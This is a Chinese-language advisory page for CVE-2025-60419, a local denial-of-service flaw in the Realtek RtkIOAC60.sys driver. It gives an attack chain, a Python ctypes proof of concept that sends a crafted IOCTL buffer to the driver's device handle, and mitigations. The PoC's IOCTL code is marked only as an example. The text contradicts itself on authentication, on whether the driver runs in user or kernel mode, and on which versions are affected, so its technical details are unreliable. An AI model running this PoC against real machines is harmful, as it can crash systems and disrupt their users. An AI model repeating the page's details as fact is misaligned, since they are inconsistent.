CVE-2025-60419 Realtek RtkIOAC60.sys IOCTL请求拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-60419

漏洞类型

拒绝服务

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

RtkIOAC60.sys (Realtek NDIS Usermode IO Driver)

漏洞概述

CVE-2025-60419是Realtek（瑞昱）公司开发的NDIS Usermode IO驱动程序中的一个拒绝服务漏洞。该驱动程序文件名为RtkIOAC60.sys，版本为6.0.5600.16348。漏洞允许本地已认证攻击者向该驱动程序发送精心构造的IOCTL（I/O Control）请求，从而导致系统服务中断或崩溃。由于该驱动程序通常随Realtek网络硬件或相关软件一起安装，攻击者可以利用此漏洞在本地环境中实施攻击，造成目标系统的可用性下降。此漏洞无需用户交互，攻击者只需具备本地访问权限即可利用，CVSS基础评分6.2分，属于中等严重程度。

技术细节

该漏洞存在于Realtek的NDIS Usermode IO驱动程序（RtkIOAC60.sys）中。驱动程序在处理IOCTL请求时未能正确验证输入参数，攻击者可以通过发送特制的IOCTL请求来触发驱动程序中的异常处理逻辑缺陷。当接收到恶意构造的IOCTL请求时，驱动程序可能会进入错误状态，导致系统崩溃或服务中断。具体而言，攻击者利用IOCTL通信机制，直接向驱动发送未经适当边界检查的数据，驱动程序在解析这些数据时未能正确处理异常情况，从而引发拒绝服务条件。由于该驱动运行在用户模式下，攻击门槛相对较低，但影响仅限于本地攻击向量。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地访问权限

STEP 2

步骤2

识别系统中是否加载了RtkIOAC60.sys驱动（版本6.0.5600.16348）

STEP 3

步骤3

通过CreateFile API打开驱动设备句柄（设备名：\\\\.\\RtkIOAC60）

STEP 4

步骤4

使用DeviceIoControl函数向驱动发送精心构造的恶意IOCTL请求

STEP 5

步骤5

驱动在处理恶意IOCTL时未能正确验证输入，导致异常或崩溃

STEP 6

步骤6

系统发生拒绝服务，可能导致蓝屏崩溃或驱动服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import ctypes
import sys
from ctypes import wintypes

# Windows API definitions
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = -1

# IOCTL code for NDIS driver communication
IOCTL_RTKIO_BASE = 0x88000000
IOCTL_RTKIO_MALICIOUS_REQUEST = 0x8800FFF0  # Example IOCTL code

# Load Windows libraries
kernel32 = ctypes.windll.kernel32

def create_handle_to_driver():
    """Open a handle to the Realtek NDIS driver"""
    device_name = "\\\\.\\RtkIOAC60"
    handle = kernel32.CreateFileA(
        device_name.encode(),
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        None,
        OPEN_EXISTING,
        0,
        None
    )
    return handle

def send_malicious_ioctl(handle):
    """Send crafted IOCTL request to trigger DoS"""
    if handle == INVALID_HANDLE_VALUE:
        print("[-] Failed to open driver handle")
        return False
    
    # Malicious input buffer - crafted to trigger vulnerability
    input_buffer = (ctypes.c_byte * 256)(*([0x41] * 256))  # Fill with 'A'
    output_buffer = (ctypes.c_byte * 256)()
    
    bytes_returned = wintypes.DWORD()
    
    result = kernel32.DeviceIoControl(
        handle,
        IOCTL_RTKIO_MALICIOUS_REQUEST,
        ctypes.byref(input_buffer),
        len(input_buffer),
        ctypes.byref(output_buffer),
        len(output_buffer),
        ctypes.byref(bytes_returned),
        None
    )
    
    return result != 0

def main():
    print("[*] CVE-2025-60419 PoC - Realtek RtkIOAC60.sys DoS")
    print("[*] Opening driver handle...")
    
    handle = create_handle_to_driver()
    
    if handle != INVALID_HANDLE_VALUE:
        print("[+] Driver handle opened successfully")
        print("[*] Sending malicious IOCTL request...")
        
        if send_malicious_ioctl(handle):
            print("[+] IOCTL request sent")
        else:
            print("[-] IOCTL request failed (driver may have crashed)")
        
        kernel32.CloseHandle(handle)
    else:
        print("[-] Could not open driver handle")
        print("[*] Note: Run as administrator or check if driver is loaded")

if __name__ == "__main__":
    main()

影响范围

RtkIOAC60.sys < 6.0.5600.16348 (需安装官方修复补丁)

Realtek NDIS Usermode IO Driver (所有未修复版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）如果业务不需要Realtek网络功能，考虑暂时禁用或卸载相关软件；2）通过组策略限制非管理员用户执行可能触发漏洞的操作；3）启用Windows防火墙和其他边界防护措施，虽然这不能阻止本地攻击但可减少攻击面；4）监控系统事件日志，关注由RtkIOAC60.sys驱动引发的任何异常或崩溃事件；5）考虑使用虚拟化技术隔离受影响组件，降低潜在影响范围。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60419
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60419
3 Details https://www.cvedetails.com/cve/CVE-2025-60419/
4 VulDB https://vuldb.com/cve/CVE-2025-60419
5 Link http://ndis.com
6 Link http://realtek.com
7 Link https://splineuser.github.io/posts/RTKVuln/